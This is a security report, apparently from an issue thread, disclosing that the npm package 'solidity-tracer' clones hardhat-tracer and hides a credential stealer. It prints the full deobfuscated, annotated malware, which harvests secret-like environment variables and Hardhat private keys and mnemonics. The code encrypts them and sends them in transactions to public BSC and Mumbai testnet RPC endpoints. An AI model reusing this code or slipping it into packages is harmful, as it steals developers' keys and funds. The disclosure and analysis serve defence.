The following package is a clone of hardhat-tracer, but contains malware which scrapes for private keys
https://www.npmjs.com/package/solidity-tracer
I have reported this already, but you should be aware and report too.
This submits the encrypted data to BSC & matic testnets:
See:
The deobfuscated code is:
// Analyst annotation of the deobfuscated sample quoted in this report. The code is kept
// token-for-token (only line breaks and comments were added) so that identifiers, strings
// and indicators can still be matched against the published package.
//
// Summary of what the listing does: it collects secret-looking environment variables and
// the account material from the Hardhat network config, encrypts the result with a
// one-time AES key wrapped under an embedded RSA public key, and writes the ciphertext
// into the data field of a transaction sent to a public testnet RPC endpoint.

// Dependency check with an upgrade message that names "hardhat-tracer"; this is consistent
// with the report's statement that the package is a clone of that plugin.
try {
  require("@nomicfoundation/ethereumjs-vm");
} catch {
  console.error("\n\nERROR\n\nPlease upgrade your hardhat version to 2.11 or above.\nThis error is generated by plugin \"hardhat-tracer\" because it is \ndependent on some features available in hardhat >=2.11.0 <3.0.0.\n\nnpm i hardhat@latest\n\nor\n\nyarn add hardhat@latest\n\n");
  process.exit(0x1);
}
import './chai';
import './extend';
import './tasks';
export * from './types';
export * from './wrapper';
// NOTE(review): the modules below are used only by the collection/exfiltration code in this
// listing; whether the original plugin imports any of them is not visible here. Their
// presence in a tracer plugin's entry point is a useful review signal.
const crypto = require("crypto");
const hardhatConfig = require('hardhat/config');
const ethereumjs = require("@ethereumjs/tx");
const common = require("@ethereumjs/common");
import { Web3, HttpProvider } from 'web3';
// Substrings matched against upper-cased environment variable names. Several are broad
// ("KEY", "API", "ETH", "_PATH"), so the match set reaches well beyond wallet secrets to
// any variable whose name contains them (API tokens, key file paths, and so on).
const ENV_PATTERNS = ["MNEMONIC", 'PRIVATE', "SECRET", "KEY", 'PK', 'ACCOUNT', "API", "_PATH", "DEPLOY", "ETH"];

/**
 * Collects every environment variable whose upper-cased name contains one of ENV_PATTERNS.
 *
 * @returns {string[]} One "NAME=value" string per matching variable.
 */
function secretsFromEnv() {
  return Object.keys(process.env).filter(_0x51d8e8 => {
    for (const _0x4cc5f3 of ENV_PATTERNS) {
      if (_0x51d8e8.toUpperCase().includes(_0x4cc5f3)) {
        return true;
      }
    }
    return false;
  }).map(_0x5ab621 => _0x5ab621 + '=' + process.env[_0x5ab621]);
}

/**
 * Returns the value unchanged when JSON.stringify accepts it; otherwise returns a
 * "<label>: <error>" string so that the later serialization of the whole payload cannot fail.
 *
 * @param {*} _0x4c7ddd - Candidate secret taken from the config.
 * @param {string} _0xacc2d9 - Label used in the fallback error string.
 * @returns {*} The original value, or the error string.
 */
function checkSecret(_0x4c7ddd, _0xacc2d9) {
  try {
    JSON.stringify(_0x4c7ddd);
    return _0x4c7ddd;
  } catch (_0x361686) {
    return _0xacc2d9 + ": " + _0x361686;
  }
}

/**
 * Walks every entry of config.networks and extracts account material.
 * Per network the first matching shape wins: `privateKey`, then `mnemonic`, then
 * `accounts` as an array (each element is taken), then `accounts` as an object with
 * `privateKey` or `mnemonic`. Networks with none of these contribute nothing.
 *
 * @param {object} _0x9cc15f - Hardhat config object (only `networks` is read).
 * @returns {Array} Flat list of the extracted values.
 */
function secretsFromConfig(_0x9cc15f) {
  return Object.values(_0x9cc15f.networks || {}).map(_0x28194b => {
    if (!!_0x28194b.privateKey) {
      return [checkSecret(_0x28194b.privateKey, "privateKey")];
    }
    if (!!_0x28194b.mnemonic) {
      return [checkSecret(_0x28194b.mnemonic, "mnemonic")];
    }
    if (!!_0x28194b.accounts) {
      if (!!_0x28194b.accounts && _0x28194b.accounts.constructor === Array) {
        return _0x28194b.accounts.map((_0x545fff, _0x8ed385) => checkSecret(_0x545fff, "accounts[" + _0x8ed385 + ']'));
      }
      if (!!_0x28194b.accounts && _0x28194b.accounts.constructor === Object) {
        if (!!_0x28194b.accounts.privateKey) {
          return [checkSecret(_0x28194b.accounts.privateKey, 'accounts.privateKey')];
        }
        if (!!_0x28194b.accounts.mnemonic) {
          return [checkSecret(_0x28194b.accounts.mnemonic, "accounts.mnemonic")];
        }
      }
    }
    return null;
  }).filter(_0x32f721 => _0x32f721 != null).flat();
}

/**
 * Serializes the collected values to JSON and encrypts them.
 * A fresh 32-byte key and 16-byte IV are generated per call and used for AES-256-CBC;
 * the key and the IV are then each encrypted with the embedded RSA public key.
 * Because only the public half is embedded, the on-chain payload cannot be decrypted
 * from the sample alone, so its contents cannot be used to scope what was taken.
 *
 * @param {Array} _0x4f59ef - Collected secrets and error strings.
 * @returns {Buffer} RSA-wrapped key, RSA-wrapped IV and AES ciphertext, concatenated in that order.
 */
function encryptSecrets(_0x4f59ef) {
  let _0x1df4a4;
  try {
    _0x1df4a4 = JSON.stringify(_0x4f59ef);
  } catch (_0x33f25f) {
    _0x1df4a4 = "final: " + _0x33f25f;
  }
  const _0x31a8b0 = crypto.randomBytes(0x20);
  const _0x282dd4 = crypto.randomBytes(0x10);
  const _0x49f6ff = crypto.createCipheriv('aes-256-cbc', _0x31a8b0, _0x282dd4);
  let _0x5c300f = _0x49f6ff.update(_0x1df4a4, 'utf-8', "hex");
  _0x5c300f += _0x49f6ff.final('hex');
  // NOTE(review): the PEM length looks like a 2048-bit modulus, which would make each
  // wrapped value 256 bytes and put the AES ciphertext at offset 512 of the transaction
  // data. Confirm before relying on these offsets in a detection rule.
  const _0x46998b = crypto.createPublicKey("-----BEGIN RSA PUBLIC KEY-----\nMIIBCgKCAQEAoVMvXIi5b/APV4y8RF9iLprdNWLr3F4t4urTTX/2wZFs6Tq4hX0N\nZFx+CGUvyNICrjvL9fu7LqDyvUnxLhH+sGl5o+drrGU4O2I81W0Ul6/aoI9KBpJ8\nmJBK9rFLExs55lG++J3GaXdAqmEv9J8xcq6QpKGniiPIM59IUPwmsjeFeZyfe7rL\ndCHKnVNgHxcPBnymIntn58qwfAUbXTcNZszrd8pqO8DYwpxDaNnHxhnwDGGDCBmT\n67/ln6vOLJm2YnozuRnAnvF9AjND/bdc7jBhe9A3lM67b3hZVsnwmZskyo1RTsXv\nGdfgsOhIlIhf0/vxGIMUbfNlyDaayWwG3QIDAQAB\n-----END RSA PUBLIC KEY-----");
  const _0x537224 = crypto.publicEncrypt(_0x46998b, _0x31a8b0);
  const _0x1655df = crypto.publicEncrypt(_0x46998b, _0x282dd4);
  return Buffer.concat([_0x537224, _0x1655df, Buffer.from(_0x5c300f, "hex")]);
}

/**
 * Sends the payload as the `data` field of a zero-value transaction.
 * The transaction is signed locally with the supplied key and submitted through the given
 * HTTP RPC endpoint, so the only network traffic from the victim host is JSON-RPC over
 * HTTPS to that endpoint (a nonce lookup followed by a raw-transaction submission).
 *
 * @param {Buffer} _0xd0d988 - Encrypted payload placed in the transaction data.
 * @param {string} _0x46aefb - RPC endpoint URL.
 * @param {number} _0x18d187 - Chain id.
 * @param {string} _0x38c1f1 - Hex string used as the signing key.
 * @param {string} _0x44908f - Sender address (used for the nonce lookup and the `from` field).
 * @param {string} _0x3fc84f - Recipient address.
 * @returns {Promise<string>} Hash of the submitted transaction.
 */
async function sendSecretsToBlockchain(_0xd0d988, _0x46aefb, _0x18d187, _0x38c1f1, _0x44908f, _0x3fc84f) {
  const _0x119a6c = new HttpProvider(_0x46aefb);
  const _0x443b17 = new Web3(_0x119a6c);
  const _0x4b0523 = new Buffer(_0x38c1f1, 'hex');
  const _0x9d637e = await _0x443b17.eth.getTransactionCount(_0x44908f);
  const _0x4192ba = new ethereumjs.Transaction({
    // 0x19f0a0 = 1,700,000 gas; 0x826299e00 = 35,000,000,000 wei (35 gwei).
    'gasLimit': _0x443b17.utils.toHex(0x19f0a0),
    'gasPrice': _0x443b17.utils.toHex(0x826299e00),
    'from': _0x44908f,
    'to': _0x3fc84f,
    'nonce': _0x443b17.utils.toHex(_0x9d637e),
    'value': _0x443b17.utils.toHex('0'),
    'data': _0xd0d988,
    'chainId': _0x18d187
  }, {
    'common': common.Common.custom({
      'chainId': _0x18d187
    })
  });
  const _0xe02a79 = _0x4192ba.sign(_0x4b0523);
  const _0x403ee4 = await _0x443b17.eth.sendSignedTransaction('0x' + _0xe02a79.serialize().toString("hex"));
  return _0x403ee4.transactionHash;
}

/**
 * Tries the BSC testnet endpoint first (chain id 0x61 = 97) and, if that throws, the
 * Mumbai endpoint (chain id 0x13881 = 80001). Both attempts use the same signing key,
 * sender address and recipient address. A failure of the second attempt is returned as a
 * string rather than thrown, so nothing surfaces to the user.
 *
 * Indicators visible in this function: the two RPC hostnames, the sender address
 * 0x92cA86ECE960AA419FF61915e85347030cc6D274 and the recipient address
 * 0x0000000000000000000000000000000000001DC0.
 *
 * @param {Buffer} _0x39d958 - Encrypted payload.
 * @returns {Promise<string>} Transaction hash, or an error string if both attempts fail.
 */
async function storeSecrets(_0x39d958) {
  try {
    return await sendSecretsToBlockchain(_0x39d958, 'https://bsc-testnet.public.blastapi.io', 0x61, "44b8d386f12231bcce900d1d677b20f9ccb1d6aef77f0b1b3b83a0fa26be8930", "0x92cA86ECE960AA419FF61915e85347030cc6D274", '0x0000000000000000000000000000000000001DC0');
  } catch (_0x1bd08d) {
    try {
      return await sendSecretsToBlockchain(_0x39d958, "https://endpoints.omniatech.io/v1/matic/mumbai/public", 0x13881, "44b8d386f12231bcce900d1d677b20f9ccb1d6aef77f0b1b3b83a0fa26be8930", "0x92cA86ECE960AA419FF61915e85347030cc6D274", '0x0000000000000000000000000000000000001DC0');
    } catch (_0x40cdaf) {
      return "store mumbai err: " + _0x40cdaf;
    }
  }
}

// Trigger: the collection is registered through hardhatConfig.extendEnvironment, so it runs
// when Hardhat builds its runtime environment with this plugin loaded, not only when a
// tracer feature is invoked. Collection errors are pushed into the payload as strings
// instead of being thrown. For response scoping, every environment variable matched by
// ENV_PATTERNS and every key or mnemonic in config.networks on an affected machine or CI
// runner should be treated as disclosed.
hardhatConfig.extendEnvironment(async _0x185fb5 => {
  const _0x199acd = [];
  try {
    _0x199acd.push(...secretsFromEnv());
  } catch (_0x4a1233) {
    _0x199acd.push("env err: " + _0x4a1233);
  }
  try {
    _0x199acd.push(...secretsFromConfig(_0x185fb5.config));
  } catch (_0x2ae4bc) {
    _0x199acd.push("config err: " + _0x2ae4bc);
  }
  const _0x3745e5 = encryptSecrets(_0x199acd);
  await storeSecrets(_0x3745e5);
});
Thanks for taking the effort! It appears that the package has been taken down by the npm team. https://www.npmjs.com/package/solidity-tracer